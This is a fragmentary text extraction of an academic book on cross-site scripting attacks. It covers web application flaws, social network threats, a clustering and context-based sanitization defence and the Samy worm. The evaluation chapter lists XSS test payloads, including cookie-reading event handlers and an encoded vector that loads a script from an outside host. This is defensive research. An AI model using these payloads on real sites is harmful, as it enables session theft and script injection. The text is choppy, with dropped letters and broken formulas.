Cross-Site Scripting Attacks PDF
Cross-Site Scripting Attacks PDF
Attacks
Security, Privacy, and Trust in Mobile
Communications
Series Editors:
Brij B. Gupta
Reasonable eforts have been made to publish reliable data and information, but the author and
publisher cannot assume responsibility for the validity of all materials or the consequences of
their use. Te authors and publishers have attempted to trace the copyright holders of all mate-
rial reproduced in this publication and apologize to copyright holders if permission to pub-
lish in this form has not been obtained. If any copyright material has not been acknowledged
please write and let us know so we may rectify in any future reprint.
Except as permitted under U.S. Copyright Law, no part of this book may be reprinted, repro-
duced, transmitted, or utilized in any form by any electronic, mechanical, or other means,
now known or hereafer invented, including photocopying, microflming, and recording, or in
any information storage or retrieval system, without written permission from the publishers.
For permission to photocopy or use material electronically from this work, access www.
copyright.com or contact the Copyright Clearance Center, Inc. (CCC), 222 Rosewood Drive,
Danvers, MA 01923, 978-750-8400. For works that are not available on CCC please contact
[email protected]
INDEX, 139
List of Figures
xiii
xiv ◾ List of Figures
xvii
xviii ◾ List of Tables
xix
xx ◾ Preface
November 2019
B. B. Gupta
Pooja Chaudhary
xxiii
Author Bio
xxv
xxvi ◾ Author Bio
Security Flaws in
Web Applications
Web Server
Request Software
Client Machine
Response
Application
Logic
[16]. Figure 1.2 shows that almost 44% of web applications are
designed using PHP as the base language, 26% are based on ASP.
NET, and so on. Other category includes languages like Python,
Ruby, etc. Also, it has been noted here that PHP and ASP.NET
are the widely used technologies for web application development
nowadays. Even though web application plays a crucial role in the
extension of the business, these contain some hidden faws that
the attacker might exploit. Tese faws may be categorized as high,
medium, and low severity level depending upon their impact on
the web application if the attacker exploits them. Figure 1.3 shows
the average number of vulnerabilities corresponding to each
severity level identifed in each web application developed using
one of the programming languages like PHP, ASP.NET, Java, and
others [15].
6 ◾ Cross-Site Scripting Attacks
FIGURE 1.7 Vulnerabilities detection rate SAST vs. DAST (in %).
to the attacker to exploit the latent faws. Figure 1.7 revealed that
a major portion of the security error is found in dynamic testing
as compared to static testing [23]. It is shown here that the per-
centage of the vulnerabilities identifed and fxed during dynamic
testing is large in comparison with static testing, whether they are
of high-, critical-, or medium-severity level.
Rapid growth of more innovative and complex application
development techniques induces complex applications and raises
difculty exponentially in identifying and resolving vulnerabili-
ties. Insecure web applications are afecting every domain like
e-commerce, manufacturing, IT, public sector, etc. As the risk
imposed through the exploitation of latent vulnerabilities in web
applications can vary from low to high, it is vital to resolve them
earlier with accuracy. Another report divulged by the Open Web
Application Security Project OWASP [18] highlights the most
common top 10 vulnerabilities embedded in web applications
belonging to almost every sector. Figure 1.8 lists out these top 10
vulnerabilities.
Tese vulnerabilities exist because of many reasons includ-
ing insecure coding, use of modular programming without
security testing of components, use of default confgurations,
Security Flaws in Web Applications ◾ 11
REFERENCES
1. Apache Sofware Foundation. (2019) Apache web server. [online]
Available at: https://httpd.apache.org/docs/2.4/howto/.
2. Babiker, M., Karaarslan, E., & Hoscan, Y. (2018, March). Web
application attack detection and forensics: A survey. In 2018 6th
International Symposium on Digital Forensic and Security (ISDFS)
(pp. 1–6). IEEE.
3. Brunil, D., Romero, M., Haddad, H. M., & Molero, A. E. (2009).
A methodological tool for asset identifcation in web applications.
In IEEE Fourth International Conference on Sofware Engineering
Advances (pp. 413–418).
4. Chaudhary, P., & Gupta, B. B. (2018). Plague of cross-site script-
ing on web applications: A review, taxonomy and challenges.
International Journal of Web Based Communities, 14(1), 64–93.
5. Gupta, B., Agrawal, D. P., & Yamaguchi, S. (eds.). (2016). Handbook
of Research on Modern Cryptographic Solutions for Computer and
Cyber Security. IGI Global.
6. Gupta, B. B. (ed.). (2018). Computer and Cyber Security. Principles,
Algorithm, Applications, and Perspectives. CRC Press.
7. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the
browser-side context-aware sanitization of suspicious HTML5
code for halting the DOM-based XSS vulnerabilities in cloud.
International Journal of Cloud Applications and Computing
(IJCAC), 7(1), 1–31.
8. Gupta, B. B., Gupta, S., Gangwar, S., Kumar, M., & Meena, P. K.
(2015). Cross-site scripting (XSS) abuse and defense: Exploitation
on several testing bed environments and its defense. Journal of
Information Privacy and Security, 11(2), 118–136.
26 ◾ Cross-Site Scripting Attacks
Security Challenges
in Social Networking
Taxonomy and Statistics
2.1 INTRODUCTION
Although social media has emerged within a short span of time, it
has attracted millions of internet users and has become the most
29
30 ◾ Cross-Site Scripting Attacks
popular use for the internet globally. With the development of the
web as a content-based platform, social media is the only digital place
which revolves around user-generated information. Te Online
Social Network (OSN) has emerged as a logical location for the bil-
lions of its users. Here they can expand their relationship bound-
aries across the globe [4, 36]. It facilitates socialization by enabling
new links with loved ones or restoring vanished ones. Moreover,
this platform can be employed by diferent organizations as a digi-
tal platform to enlarge their business through advertising and for
entertainment purposes, education, and so on. Te most prominent
services provided by OSN are illustrated in Figure 2.1.
the main focus for attackers are: (1) the high concentration of its
topology, (2) the use of enhanced and advanced web development
technologies like AJAX and JavaScript for more interactive appli-
cations, and (3) a stronger trust relationship among nodes than in
general networks. Figure 2.5 shows the number of vulnerabilities
identifed on some of the social media platforms.
Tese hidden vulnerabilities not only afect the usage and
popularity of social media but also afect the user’s privacy and
security. Recently, in 2017, hackers attacked one of the highly used
REFERENCES
1. Al-Qurishi, M., Al-Rakhami, M., Alamri, A., Alrubaian, M.,
Rahman, S. M. M., & Hossain, M. S. (2017). Sybil defense techniques
in online social networks: A survey. IEEE Access, 5, 1200–1219.
2. Almomani, A., Gupta, B. B., Wan, T. C., Altaher, A., & Manickam,
S. (2013). Phishing dynamic evolving neural fuzzy framework
for online detection zero-day phishing email. arXiv Preprint
ArXiv:1302.0629.
3. Benenson, Z., Gassmann, F., & Landwirth, R. (2017, April).
Unpacking spear phishing susceptibility. In International
Conference on Financial Cryptography and Data Security (pp. 610–
627). Springer, Cham.
4. Boulianne, S. (2019). Revolution in the making? Social media
efects across the globe. Information, Communication and Society,
22(1), 39–54.
5. Cai, Z., He, Z., Guan, X., & Li, Y. (2016). Collective data-saniti-
zation for preventing sensitive information inference attacks in
social networks. IEEE Transactions on Dependable and Secure
Computing, 15(4), 577–590.
6. Chaudhary, P., Gupta, B. B., & Gupta, S. (2016, March). Cross-
site scripting (XSS) worms in Online Social Network (OSN):
Taxonomy and defensive mechanisms. In 2016 3rd International
Conference on Computing for Sustainable Global Development
(INDIACom) (pp. 2131–2136). IEEE.
7. Ferrara, E., Varol, O., Davis, C., Menczer, F., & Flammini, A.
(2016). Te rise of social bots. Communications of the ACM, 59(7),
96–104.
8. Fire, M., Goldschmidt, R., & Elovici, Y. (2014). Online social net-
works: Treats and solutions. IEEE Communications Surveys and
Tutorials, 16(4), 2019–2036.
9. Gupta, B. B. (ed.). (2018). Computer and Cyber Security: Principles,
Algorithm, Applications, and Perspectives. CRC Press.
10. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the
browser-side context-aware sanitization of suspicious HTML5 code
for halting the DOM-based XSS vulnerabilities in cloud. International
Journal of Cloud Applications and Computing, 7(1), 1–31.
11. Gupta, B. B., & Sheng, Q. Z. (eds.). (2019). Machine Learning for
Computer and Cyber Security: Principle, Algorithms, and Practices.
CRC Press.
50 ◾ Cross-Site Scripting Attacks
12. Gupta, S., & Gugulothu, N. (2018). Secure nosql for the social net-
working and e-commerce based bigdata applications deployed in
cloud. International Journal of Cloud Applications and Computing,
8(2), 113–129.
13. Gupta, S., & Gupta, B. B. (2015). BDS: Browser dependent XSS sani-
tizer. In Handbook of Research on Securing Cloud-Based Databases
with Biometric Applications (pp. 174–191). IGI Global.
14. Gupta, S., & Gupta, B. B. (2015, May). PHP-sensor: A prototype
method to discover workfow violation and XSS vulnerabili-
ties in PHP web applications. In Proceedings of the 12th ACM
International Conference on Computing Frontiers (p. 59). ACM.
15. Gupta, S., & Gupta, B. B. (2016). JS-SAN: Defense mechanism for
HTML5‐based web applications against JavaScript code injec-
tion vulnerabilities. Security and Communication Networks, 9(11),
1477–1495.
16. Isaac, Mike, & Frenkel, Sheera. Facebook security breach exposes
accounts of 50 million users. [online] Available at: https://ww
w.nytimes.com/2018/09/28/technology/facebook-hack-data-breac
h.html
17. Jain, A. K., & Gupta, B. B. (2017). Phishing detection: Analysis of
visual similarity based approaches. Security and Communication
Networks, 2017.
18. Jiang, F., Fu, Y., Gupta, B. B., Lou, F., Rho, S., Meng, F., & Tian,
Z. (2018). Deep learning based multi-channel intelligent attack
detection for data security. IEEE Transactions on Sustainable
Computing.
19. Kamhoua, G. A., Pissinou, N., Iyengar, S. S., Beltran, J., Kamhoua,
C., Hernandez, B. L., Njilla, L., & Makki, A. P. (2017, June).
Preventing colluding identity clone attacks in online social net-
works. In 2017 IEEE 37th International Conference on Distributed
Computing Systems Workshops (ICDCSW) (pp. 187–192). IEEE.
20. Li, C., Zhang, Z., & Zhang, L. (2018). A novel authorization scheme
for multimedia social networks under cloud storage method by
using MA-CP-ABE. International Journal of Cloud Applications
and Computing, 8(3), 32–47.
21. Li, H., Chen, Q., Zhu, H., Ma, D., Wen, H., & Shen, X. S. (2017).
Privacy leakage via de-anonymization and aggregation in hetero-
geneous social networks. IEEE Transactions on Dependable and
Secure Computing.
Security Challenges in Social Networking ◾ 51
22. Li, H., Zhu, H., Du, S., Liang, X., & Shen, X. S. (2016). Privacy leakage of
location sharing in mobile social networks: Attacks and defense. IEEE
Transactions on Dependable and Secure Computing, 15(4), 646–660.
23. Liu, J., Tao, Y., & Bai, Q. (2016, August). Towards exposing cyber-
stalkers in online social networks. In Pacifc Rim International
Conference on Artifcial Intelligence (pp. 763–770). Springer, Cham.
24. Mocktoolah, A., & Khedo, K. K. (2015, December). Privacy
challenges in proximity based social networking: Techniques
& solutions. In 2015 International Conference on Computing,
Communication and Security (ICCCS) (pp. 1–8). IEEE.
25. Olakanmi, O. O., & Dada, A. (2019). An efcient privacy-pre-
serving approach for secure verifable outsourced computing on
untrusted platforms. International Journal of Cloud Applications
and Computing, 9(2), 79–98.
26. Patel, P., Kannoorpatti, K., Shanmugam, B., Azam, S., & Yeo, K.
C. (2017, January). A theoretical review of social media usage by
cyber-criminals. In 2017 International Conference on Computer
Communication and Informatics (ICCCI) (pp. 1–6). IEEE.
27. Pew Research Report Pew Research Center. (2018). Social Media
Use in 2018. [online] Available at: https://www.pewresearch.org/in
ternet/2018/03/01/social-media-use-in-2018/.
28. Rathore, S., Sharma, P. K., Loia, V., Jeong, Y. S., & Park, J. H. (2017).
Social network security: Issues, challenges, threats, and solutions.
Information Sciences, 421, 43–69.
29. Sahoo, S. R., & Gupta, B. B. (2019). Classifcation of various attacks
and their defence mechanism in online social networks: A survey.
Enterprise Information Systems, 13(6), 832–864.
30. Social media active users. [online] Available at: https://www.sta
tista.com/statistics/272014/global-social-networks-ranked-by
-number-of-users/.
31. Squicciarini, A., Rajtmajer, S., Liu, Y., & Grifn, C. (2015, August).
Identifcation and characterization of cyberbullying dynamics in
an online social network. In Proceedings of the 2015 IEEE/ACM
International Conference on Advances in Social Networks Analysis
and Mining 2015 (pp. 280–285). ACM.
32. Tian, Y., Yuan, J., & Yu, S. (2016, October). SBPA: Social behav-
ior based cross social network phishing attacks. In 2016 IEEE
Conference on Communications and Network Security (CNS) (pp.
366–367). IEEE.
52 ◾ Cross-Site Scripting Attacks
Fundamentals of
Cross-Site Scripting
(XSS) Attack
53
54 ◾ Cross-Site Scripting Attacks
Step 2: Now, enter any string into the identifed feld and sub-
mit it. Search for this string in the source code of the web
page.
Step 3: Check if entered string is displayed on the web page, as
the result of step 2.
Step 5: If the web page does not employ any sanitization tech-
nique, then malicious script will be executed in the browser.
Afer its successful execution, a dialog box will pop up,
refecting the XSS attack in the message body of box.
code into the server just once and then afects a large number of
benign users with improper sanitization mechanisms. Figure 3.1
depicts the scenario of persistent XSS attack.
REFERENCES
1. Almomani, A., Gupta, B. B., Wan, T. C., Altaher, A., & Manickam, S.
(2013) Phishing dynamic evolving neural fuzzy framework for online
detection zero-day phishing email. arXiv preprint arXiv:1302.0629.
2. Chaudhary, P., Gupta, B. B., & Gupta, S. (2018). Defending the
OSN-based web applications from XSS attacks using dynamic
javascript code and content isolation. In Quality, IT and Business
Operations (pp. 107–119). Springer, Singapore.
3. Chaudhary, P., Gupta, S., & Gupta, B. B. (2016). Auditing defense
against XSS worms in online social network-based web applica-
tions. In Handbook of Research on Modern Cryptographic Solutions
for Computer and Cyber Security (pp. 216–245). IGI Global.
4. Cross site scripting, OWASP. [online] Available at: https://ww
w.owasp.org/index.php/Cross-site_Scripting (XSS).
5. Dong, G., Zhang, Y., Wang, X., Wang, P., & Liu, L. (2014). Detecting
cross site scripting vulnerabilities introduced by HTML5. In 2014
11th International Joint Conference on Computer Science and
Sofware Engineering (JCSSE). IEEE.
6. Duchene, F., Rawat, S., Richier, J.-L., & Groz, R. (2014).
KameleonFuzz: Evolutionary fuzzing for black-box XSS detection.
In Proceedings of the 4th ACM Conference on Data and Application
Security and Privacy (pp. 37–48). ACM.
7. Guo, X., Jin, S., & Zhang, Y. (2015). XSS vulnerability detection
using optimized attack vector repertory. In 2015 International
Conference On Cyber-Enabled Distributed Computing and
Knowledge Discovery (CyberC). IEEE.
8. Gupta, B. B. (ed.). (2018). Computer and Cyber Security: Principles,
Algorithm, Applications, and Perspectives. CRC Press.
9. Gupta, B. B., & Badve, O. P. (2017). Taxonomy of DoS and DDoS
attacks and desirable defense mechanism in a cloud comput-
ing environment. Neural Computing and Applications, 28(12),
3655–3682.
10. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the
browser-side context-aware sanitization of suspicious HTML5 code
for halting the DOM-based XSS vulnerabilities in cloud. International
Journal of Cloud Applications and Computing, 7(1), 1–31.
11. Gupta, M. K., Govil, M. C., Singh, G., & Sharma, P. (2015). XSSDM:
Towards detection and mitigation of cross-site scripting vulner-
abilities in web applications. In 2015 International Conference
72 ◾ Cross-Site Scripting Attacks
23. Lekies, S., Stock, B., & Johns, M. (2013). 25 million fows later:
Large-scale detection of DOM-based XSS. In Proceedings of the
2013 ACM SIGSAC Conference on Computer & Communications
Security. ACM.
24. Mokbal, F. M. M., Dan, W., Imran, A., Jiuchuan, L., Akhtar, F.,
& Xiaoxi, W. (2019). MLPXSS: An integrated XSS-based attack
detection scheme in web applications using multilayer perceptron
technique. IEEE Access, 7, 100567–100580.
25. Moniruzzaman, M., Bagirov, A., Gondal, I., & Brown, S. (2018,
June). A server side solution for detecting WebInject: A machine
learning approach. In Pacifc-Asia Conference on Knowledge
Discovery and Data Mining (pp. 162–167). Springer, Cham.
26. Nadji, Y., Saxena, P., & Song, D. (2009, February). Document
structure integrity: A robust basis for cross-site scripting defense.
In NDSS.
27. Panja, B., Gennarelli, T., & Meharia, P. (2015). Handling cross site
scripting attacks using cache check to reduce webpage rendering
time with elimination of sanitization and fltering in light weight
mobile web browser. In 2015 First Conference on Mobile and Secure
Services (MOBISECSERV). IEEE.
28. Parameshwaran, E. B., Shinde, S., Dang, H., Sadhu, A., & Saxena, P.
(2015). DexterJS: Robust testing platform for DOM-based XSS vulner-
abilities. In Proceedings of the 2015 10th Joint Meeting on Foundations
of Sofware Engineering (ESEC/FSE 2015) (pp. 946–949). ACM.
29. Rocha, T. S., & Souto, E. (2014). ETSSDetector: A tool to automati-
cally detect cross-site scripting vulnerabilities. In 2014 IEEE 13th
International Symposium on Network Computing and Applications
(NCA). IEEE.
30. Ruse, M. E., & Basu, S. (2013). Detecting cross-site scripting vulner-
ability using concolic testing. In 2013 Tenth International Conference
on Information Technology: New Generations (ITNG). IEEE.
31. Scholte, T., Robertson, W., Balzarotti, D., & Kirda, E. (2012).
Preventing input validation vulnerabilities in web applications
through automated type analysis. In 2012 IEEE 36th Annual
Computer Sofware and Applications Conference (COMPSAC). IEEE.
32. Steinhauser, A., & Tůma, P. (2019). DjangoChecker: Applying
extended taint tracking and server side parsing for detection of
context‐sensitive XSS faws. Sofware: Practice and Experience,
49(1), 130–148.
74 ◾ Cross-Site Scripting Attacks
33. Stock, B., Pfstner, S., Kaiser, B., Lekies, S., & Johns, M. (2015). From
facepalm to brain bender: Exploring client-side cross-site scripting.
In Proceedings of the 22nd ACM SIGSAC Conference on Computer
and Communications Security (CCS '15) (pp. 1419–1430). ACM.
34. Tripathi, S., Gupta, B., Almomani, A., Mishra, A., & Veluru, S.
(2013). Hadoop based defense solution to handle distributed denial
of service (ddos) attacks. Journal of Information Security, 04(3), 150.
35. Van Acker, S., Nikiforakis, N., Desmet, L., Joosen, W., & Piessens,
F. (2012). FlashOver: Automated discovery of cross-site script-
ing vulnerabilities in rich internet applications. In Proceedings
of the 7th ACM Symposium on Information, Computer and
Communications Security) (pp. 12–13). ACM.
36. Vishnu, B. A., & Jevitha, K. P. (2014). Prediction of cross-site script-
ing attack using machine learning algorithms. In Proceedings of
the 2014 International Conference on Interdisciplinary Advances in
Applied Computing (ICONIAAC '14). ACM.
37. Wang, R., Jia, X., Li, Q., & Zhang, D. (2015). Improved N-gram
approach for cross-site scripting detection in Online Social
Network. In 2015 Science and Information Conference (SAI). IEEE.
38. Wang, R., Jia, X., Li, Q., & Zhang, S. (2014). Machine learn-
ing based cross-site scripting detection in online social network.
In 2014 IEEE International Conference on High Performance
Computing and Communications, 2014 IEEE 6th International
Symposium on Cyberspace Safety and Security, 2014 IEEE 11th
International Conference on Embedded Sofware and Syst (HPCC,
CSS, ICESS). IEEE.
39. Wang, R., Xu, G., Zeng, X., Li, X., & Feng, Z. (2018). TT-XSS: A
novel taint tracking based dynamic detection framework for DOM
cross-site scripting. Journal of Parallel and Distributed Computing,
118, 100–106.
40. Xiao, W., Sun, J., Chen, H., & Xu, X. (2014). Preventing client side
XSS with rewrite based dynamic information fow. In 2014 Sixth
International Symposium on Parallel Architectures, Algorithms and
Programing (PAAP). IEEE.
41. XSS incidents information. [online] Available at: http://www.
xssed.com/.
42. Zhang, Q., Chen, H., & Sun, J. (2010). An execution-fow based
method for detecting cross-site scripting attacks. In 2010 2nd
International Conference on Sofware Engineering and Data
Mining (SEDM). IEEE.
CHAPTER 4
Clustering and
Context-Based
Sanitization
Mechanism for
Defending against
XSS Attack
75
76 ◾ Cross-Site Scripting Attacks
4.1 INTRODUCTION
When we think about the internet, it means a market for several
web applications that may correspond to diferent sectors or busi-
nesses such as e-commerce, manufacturing, telecom, education,
and so many [10, 12]. However, the most dominant and popular
web application is the social network. Social media has taken the
usage of the internet to another level. Now, everyone is connected
to their loved ones either personally or professionally via a single
network. But not every person is good; it attracts evil persons
like fraudsters, attackers, and online predators. Social media has
become a platform to host several vulnerabilities and attacks [24,
30]. XSS attack is a highly exploited vulnerability that helps in
triggering other dangerous attacks like DoS. Terefore, research-
ers have developed techniques for mitigating XSS [5, 6, 11, 13, 19].
Input validation and sanitization are considered to be the frst
and foremost defensive measures for mitigating the efects of XSS
worms from the platforms of web applications [5]. Nevertheless,
these techniques incur high-performance overhead. Terefore,
this chapter presents an approach based on clustering and con-
text-based sanitization to thwart XSS attack on social media. Tis
approach utilizes some basic mechanisms to achieve its function-
alities. Hence, in the following subsections, we will discuss the
preliminaries required to understand the working of proposed
approach.
4.1.1 Views
Views can be understood as the working interface for the current
user of the web application for the requested action. Actually, it is
a sandboxed thread that implements a portion of the web applica-
tion. At the browser end, it will appear as the web page or a part of
it. It is used to secure the other ongoing processes on the system.
Sanitization Mechanisms for Defending against XSS Attack ◾ 77
User ID Privileges
<1> Read, Write, Update
style sheet, script, anchors, href, etc. Tese contexts may be used
by the attacker to launch XSS attack.
• When the server receives the request from the user, it is for-
warded to the session manager. Here, it is mapped to the
stored session corresponding to the user’s cookie informa-
tion (i.e. user’s login credentials).
• Te request is processed to check whether it alters the server
content or not. For example, a request to post a comment. If
it does not modify the content, then the server generates the
static web page and returns it to the browser.
82 ◾ Cross-Site Scripting Attacks
Figure 4.3 presents the working fow chart of the proposed approach.
Sanitization Mechanisms for Defending against XSS Attack ◾ 83
<script>alert(48a$bc);</script>
Sanitization Mechanisms for Defending against XSS Attack ◾ 87
Threshold ( a ):= 0;
Start
C_Rep ¬ NULL;
VX ¬ 0
Compare(AX , AX+1);
VX ¬ Levenshtein_distance(AX, AX+1);
If (VX > a )
C_Rep ¬ T È C_Rep;
End If
Else
End Else
Return C_Rep
End
<script>alert(48xv&ez);</script>
<script>alert(48-S-);</script>
Start
SCLU_Rep Ü NULL;
VU Ü f ;
VS Ü f;
VU Ü untrusted-variable(TI);
CI Ü Context(VU);
VS Ü SI (TI);
SR_log Ü VS È SR_log;
SCLU_Rep Ü Template-generator(SI);
Return SCLU_Rep;
End
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
(CSS) ATTACK VECTORS
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</S
TYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><
LI>XSS</br>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
(Continued )
Sanitization Mechanisms for Defending against XSS Attack ◾ 95
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'">
XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<img src=asdf onerror=alert(document.cookie)>
HTML MALICIOUS EVENT
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22crip
t%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
HANDLER
<video onerror="alert(1)"><source></source></video>
<IMG SRC= onmouseover="alert('xss')">
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG SRC=# onmouseover="alert('xxs')">
for all fve testing platforms. Tis is done by dividing the number
of XSS attack payload detected to the number of malicious scripts
exploited for each category of attack vectors. Figure 4.6 highlights
the detection rate of fve OSN web applications with respect to
individual categories of attack vectors. It is clearly refected from
Figure 4.6 that the highest detection rate is observed in the Elgg as
compared to all other platforms of OSN-based web applications.
FalsePositves(FP)
False Positive Rate ( FPR ) =
FalsePositives(FP)+
+ True Negatives(TN)
TABLE 4.6 Performance Analysis by Calculating F-Measure
Web
Application Total # of TP # of FP # of TN # of FN Precision FPR FNR Recall F-Measure
Elgg 127 116 5 4 2 0.958 0.5 0.016 0.983 0.970
98 ◾ Cross-Site Scripting Attacks
False Negatives(FN)
False Negative Rate ( FNR ) =
False Negatives(FN))+TruePositives(TP)
True positive ( TP )
Precision =
true positive ( TP ) + false positive ( FP )
True positive ( TP )
Recall =
true positive ( TP ) + false negative ( FN )
2 ( TP )
F-Measure =
2 ( TP ) + FP + FN
122 0 0 2.549
125 3 9
120 –2 4
119 –3 9
124 2 4
N1
Mean (µ) = i N1 = 122 2
i
˛X å(X - m) = 26
i =1
Sanitization Mechanisms for Defending against XSS Attack ◾ 101
TABLE 4.8 Statistics of XSS Attack Vectors Detected
Standard Deviation
N2
2
# of Malicious Scripts S2 = å(X - m) i (N 2 -1)
Detected (Xj) (Xi – μ) (Xi – μ) 2 i =1
120 4 16 3.905
118 2 4
102 ◾ Cross-Site Scripting Attacks
117 1 1
110 –6 36
118 2 4
N1
Mean (µ) = i N 2 = 116 2
i
˛X ˛ (X − µ) = 61
i =1
Sanitization Mechanisms for Defending against XSS Attack ◾ 103
REFERENCES
1. 523 XSS vectors available. [online] Available at: http://xss2.tech-
nomancie.net/vectors.
2. @XSS vector twitter account. [online] Available at: https://twitter.
com/XSSVector.
3. Aggarwal, C. C., & Zhai, C. (2012). A survey of text clustering
algorithms. In Mining Text Data (pp. 77–128). Springer, Boston,
MA.
4. Balzarotti, D., Cova, M., Felmetsger, V., Jovanovic, N., Kirda, E.,
Kruegel, C., & Vigna, G.. (2008). Saner: Composing static and
dynamic analysis to validate sanitization in web applications. In
IEEE Symposium on Security and Privacy. SP 2008 (pp. 387–401).
IEEE, Oakland, CA.
5. Chaudhary, P., & Gupta, B. B. (2018). Plague of cross-site script-
ing on web applications: A review, taxonomy and challenges.
International Journal of Web Based Communities, 14(1), 64–93.
6. Chaudhary, P., Gupta, B. B., & Gupta, S. (2019). A framework
for preserving the privacy of online users against XSS worms
on online social network. International Journal of Information
Technology and Web Engineering, 14(1), 85–111.
7. Drupal social networking site. [online] Available at: https://www.
drupal.org/download.
106 ◾ Cross-Site Scripting Attacks
22. Metzler, D., Dumais, S., & Meek, C. (2007). Similarity measures
for short segments of text. In European Conference on Information
Retrieval. Springer, Berlin, Heidelberg.
23. Samuel, M., Saxena, P., & Song, D. (2011). Context-sensitive auto-
sanitization in web templating languages using type qualifers.
In Proceedings of the 18th ACM Conference on Computer and
Communications Security (pp. 587–600). ACM.
24. Sarmah, U., Bhattacharyya, D. K., & Kalita, J. K. (2018). A sur-
vey of detection methods for XSS attacks. Journal of Network and
Computer Applications, 118, 113–143.
25. Saxena, P., Hanna, S., Poosankam, P., & Song, D. (2010). FLAX:
Systematic discovery of client-side validation vulnerabilities in
rich web applications. In NDSS Symposium.
26. Saxena, P., Molnar, D., & Livshits, B. (2011). SCRIPTGARD:
Automatic context-sensitive sanitization for large-scale legacy
web applications. In Proceedings of the 18th ACM Conference on
Computer and Communications Security (pp. 601–614). ACM,
Chicago, IL.
27. Technical attack sheet for cross site penetration tests. [online]
Available at: http://www.vulnerability-lab.com/resources/do
cuments/531.txt.
28. WordPress. [online] Available at: http://wordpress.org/.
29. XSS flter evasion cheat sheet. [online] Available at: https://ww
w.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.
30. Zhang, Z., & Gupta, B. B. (2018). Social media security and trust-
worthiness: Overview and new direction. Future Generation
Computer Systems, 86, 914–925.
CHAPTER 5
Real-World XSS
Worms and
Handling Tools
users as possible. Afer many years, these worms are now spread-
ing across all web applications, which can provide a platform for
the XSS worms to proliferate. Te XSS worm is more likely to ini-
tiate in web applications with community-driven characteristics
like social networking, forums, blogs, web mails, chat rooms, etc.
forces the user browser to add Samy in the friends list, by using
XmlHttpRequest (XHR). Tis worm posts a message on the vic-
tim’s profle page as “Samy is my hero” and infects the user’s pro-
fle with its copy. In this way, this worm had abused more than 1
million legitimate users of MySpace within a time period of 20
hours. Figure 5.1 depicts the number of users infected by the dif-
ferent worms and presents that Samy is the only worm with high
infection rate [6]. Tis fgure basically provides a comparative
analysis on the infection rate between other worms such as Code
Red I and Code Red II with Samy worm.
Tis worm caused MySpace to get shutdown and to fx the
vulnerability. Samy got the control of over 1 million users. Just
think of what could happen with control over large numbers of
accounts and by grabbing many gigabits of network bandwidth
browsers linked with Gmail, bank accounts, trade markets, and
so on. From this, we can estimate the efects of the XSS worm.
Te attacker might be able to launch DDoS attack on a large scale.
But what makes Samy worm propagate at such a high rate
when other worms can’t? Let’s discuss this in detail. Other inter-
net worms such as Code Red I propagate in network through
FIGURE 5.2 Stages during the life cycle of the XSS worm.
classifed the XSS worms into three types based on their style of infec-
tion and propagation as Exponential XSS worm, XSS Flash worm, and
Linear XSS worm. Now, let’s dissect each type and delve deep into it.
efciency depends on how fast they can spread and how many
targets they infect. Te attacker who develops the worm wants to
infect as many users as possible because a worm could be more
catastrophic if it spreads quickly. Te speed of infection is pro-
portionate to the identifcation of vulnerable target machine. Te
vulnerable machine can be recognized through scanning, but lin-
ear scanning is not sufcient. Terefore, hit-list scanning is done
to gain maximum beneft. It uses a pre-compiled list of vulner-
able machines. Tis is the main idea behind XSS Warhol worm,
also known as XSS Flash worm. It is the fastest propagating worm
on the internet which infects almost every vulnerable machine
worldwide, within 15 minutes of its initiation. It is a conceptual-
ized worm, as in reality such infection speed is not possible. Te
most threating worm, i.e. Samy worm, has infected 100,000 users
within 20 hours.
In the initial phase, the attacker collects a pre-complied list of
vulnerable machines and releases the Warhol worm. So whenever
this worm infects a machine, it divides the list into two parts,
keeping one list with itself, and gives the other to the infected
machine. Tis ensures scanning of all machines in the list under a
minute, and the worm replicates itself on all identifed machines.
However, this process slows down if the number of uninfected
machines is less. So permutation scanning is used, in which the
already-infected machine behaves diferently so that the time to
re-infect can be saved. Here, all worms have the same pseudo ran-
dom permutation of searching address space. It helps in increas-
ing the propagation speed by reducing the re-infection efort.
Finally, the attacker achieves a higher infection rate with complete
scanning.
Te infection accuracy of XSS Flash worm is high because XSS
worms are platform independent. It is highly likely that if one
browser is exploited with a malicious code, then the others will
also get infected; afer all, every browser has the same functional-
ity and displays any site with the same interface and functions.
Real-World XSS Worms and Handling Tools ◾ 117
REFERENCES
1. Burp scanner. [online] Available at: https://support.portswigger.ne
